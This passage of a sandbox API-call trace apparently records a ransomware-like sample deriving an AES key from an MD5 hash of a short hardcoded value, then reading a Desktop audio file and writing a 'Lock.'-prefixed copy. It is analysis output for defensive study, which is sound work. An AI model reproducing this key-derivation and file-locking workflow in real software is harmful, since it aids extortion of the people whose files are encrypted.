0 [0100.777] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0100.777] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0100.777] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0100.777] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0100.777] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0100.777] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0100.777] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0100.777] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0100.777] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0100.777] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0100.777] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0100.777] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0100.777] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0100.777] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0100.777] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0100.777] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0100.777] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0100.777] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0100.777] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0100.777] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0100.777] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0100.777] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0100.778] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0100.778] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0100.778] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0100.778] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0100.778] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x2aa9d78, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0100.778] CryptCreateHash (in: hProv=0x9beab0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8cef48 | out: phHash=0x8cef48) returned 1 [0100.778] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0100.778] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0100.778] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0100.778] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0100.778] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0100.778] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2a71b08, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0100.778] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0100.778] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0100.778] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0100.778] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2a71b18, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0100.778] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0100.778] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0100.778] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0100.778] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0100.778] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0100.779] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0100.779] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0100.779] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0100.779] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x2aa9e68, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0100.779] CryptHashData (hHash=0x9a3b80, pbData=0x2a71908, dwDataLen=0x3, dwFlags=0x1) returned 1 [0100.779] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0100.779] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0100.779] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0100.779] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0100.779] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0100.779] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0100.779] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0100.779] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0100.779] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0100.779] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0100.779] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0100.779] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0100.779] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0100.779] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0100.779] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0100.779] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x2aa9d30, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0100.779] CryptDeriveKey (in: hProv=0x9beab0, Algid=0x6601, hBaseData=0x9a3b80, dwFlags=0x1, phKey=0x8cef48 | out: phKey=0x8cef48*=0x9a4440) returned 1 [0100.780] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0100.780] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0100.780] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0100.780] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0100.780] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0100.780] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0100.780] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0100.780] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0100.780] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0100.780] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0100.780] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0100.780] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0100.780] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0100.780] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x29f6ee0, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0100.780] CryptDestroyHash (hHash=0x9a3b80) returned 1 [0100.780] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0100.780] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0100.780] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0100.780] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0100.780] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0100.781] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop/fqpL_g35J.m4a" (normalized: "c:\\users\\fd1hvy\\desktop\\fqpl_g35j.m4a"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x44c [0100.781] SetFilePointerEx (in: hFile=0x44c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0100.781] SetFilePointerEx (in: hFile=0x44c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf2c0 | out: lpNewFilePointer=0x0) returned 1 [0100.781] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f70c0 [0100.781] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96b8 | out: hHeap=0x2af0000) returned 1 [0100.781] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9478 | out: hHeap=0x2af0000) returned 1 [0100.781] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0100.781] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90e8 | out: hHeap=0x2af0000) returned 1 [0100.781] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0100.781] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9448 | out: hHeap=0x2af0000) returned 1 [0100.782] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a720d8 | out: hHeap=0x2af0000) returned 1 [0100.782] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9460 | out: hHeap=0x2af0000) returned 1 [0100.782] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0100.782] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a720d8 [0100.782] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a720d8 | out: hHeap=0x2af0000) returned 1 [0100.782] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e840 [0100.782] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0100.782] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e840 | out: hHeap=0x2af0000) returned 1 [0100.782] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0100.782] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72098 [0100.782] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9448 [0100.782] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9460 [0100.782] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a720d8 [0100.782] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9478 [0100.782] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a720d8 | out: hHeap=0x2af0000) returned 1 [0100.782] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9790 [0100.782] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a720d8 [0100.782] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9808 [0100.782] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9700 [0100.782] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72778 [0100.782] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0100.782] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0100.782] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0100.782] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9700 | out: hHeap=0x2af0000) returned 1 [0100.782] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9808 | out: hHeap=0x2af0000) returned 1 [0100.782] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a720d8 | out: hHeap=0x2af0000) returned 1 [0100.782] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96b8 [0100.782] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a720d8 [0100.782] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x70) returned 0x2a75600 [0100.783] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96b8 | out: hHeap=0x2af0000) returned 1 [0100.783] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop/" (normalized: "c:\\users\\fd1hvy\\desktop")) returned 0x11 [0100.783] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a75600 | out: hHeap=0x2af0000) returned 1 [0100.783] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a720d8 | out: hHeap=0x2af0000) returned 1 [0100.783] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb40 [0100.783] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10000) returned 0x2abe880 [0100.783] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9778 [0100.783] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a720d8 [0100.783] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop/Lock.fqpL_g35J.m4a" (normalized: "c:\\users\\fd1hvy\\desktop\\lock.fqpl_g35j.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x458 [0100.783] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f6e80 [0100.784] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9478 | out: hHeap=0x2af0000) returned 1 [0100.784] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9460 | out: hHeap=0x2af0000) returned 1 [0100.784] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9790 | out: hHeap=0x2af0000) returned 1 [0100.784] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9448 | out: hHeap=0x2af0000) returned 1 [0100.860] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72098 | out: hHeap=0x2af0000) returned 1 [0100.860] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9430 | out: hHeap=0x2af0000) returned 1 [0100.860] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72708 | out: hHeap=0x2af0000) returned 1 [0100.860] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9538 | out: hHeap=0x2af0000) returned 1 [0100.860] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0100.860] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72778 [0100.860] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0100.860] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e6c0 [0100.860] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0100.860] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e6c0 | out: hHeap=0x2af0000) returned 1 [0100.860] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0100.860] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb00 [0100.860] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0100.860] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72708 [0100.860] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9478 [0100.860] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9430 [0100.860] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72778 [0100.860] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0100.860] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9448 [0100.860] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72778 [0100.860] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9460 [0100.860] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9538 [0100.860] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b58 [0100.860] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0100.860] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b58 | out: hHeap=0x2af0000) returned 1 [0100.860] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0100.860] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9538 | out: hHeap=0x2af0000) returned 1 [0100.860] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9460 | out: hHeap=0x2af0000) returned 1 [0100.861] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a08 [0100.861] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f70a0 [0100.861] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9538 [0100.861] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9460 [0100.861] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b08 [0100.861] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9820 [0100.861] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0100.861] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9820 | out: hHeap=0x2af0000) returned 1 [0100.861] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9460 | out: hHeap=0x2af0000) returned 1 [0100.861] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9538 | out: hHeap=0x2af0000) returned 1 [0100.861] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f70a0 | out: hHeap=0x2af0000) returned 1 [0100.861] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a08 | out: hHeap=0x2af0000) returned 1 [0100.861] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0100.861] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9460 [0100.861] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9538 [0100.861] RtlAllocateHeap 